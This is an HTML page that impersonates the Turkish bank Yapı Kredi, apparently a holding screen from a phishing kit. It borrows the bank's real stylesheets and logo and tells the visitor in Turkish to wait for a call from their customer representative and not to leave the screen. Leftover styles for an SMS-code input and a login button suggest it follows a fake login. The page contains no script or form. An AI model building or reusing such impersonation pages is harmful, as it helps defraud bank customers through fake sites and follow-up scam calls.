<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Yapı Kredi</title>
    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/source/fonts.css">
    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/main.ui.min.css">
    <link rel="stylesheet" href="main.css">
    <style>
        .responsive-image {
            width: 100%;
            max-width: 150px;
            height: auto;
            margin-bottom: 15px;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }
        .container {
            text-align: center;
        }
        .sms-input {
            margin: 20px auto;
            display: block;
        }
        .giris-button {
            background-color: #004481;
            color: white;
            border: none;
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
            display: block;
            margin: 20px auto;
        }
    </style>
    
</head>
<body>
    <div class="container">
        <div class="logo">
            <a href="https://www.yapikredi.com.tr" target="_blank">
                <img src="https://internetsube.yapikredi.com.tr/ngi-static/img/logo.png" alt="Yapı Kredi Logo">
            </a>
        </div>
        
        <img src="temsilci.png" alt="Başvuru Onay" class="responsive-image">
        
        <div class="message"><strong>Bireysel Müşteri Temsilcinizden Gelecek Çağrıyı Bekleyiniz.</strong></div>
        <div class="note">Lütfen Bu Ekrandan Ayrılmayınız. </div>
        

    </div>
</body>
</html>
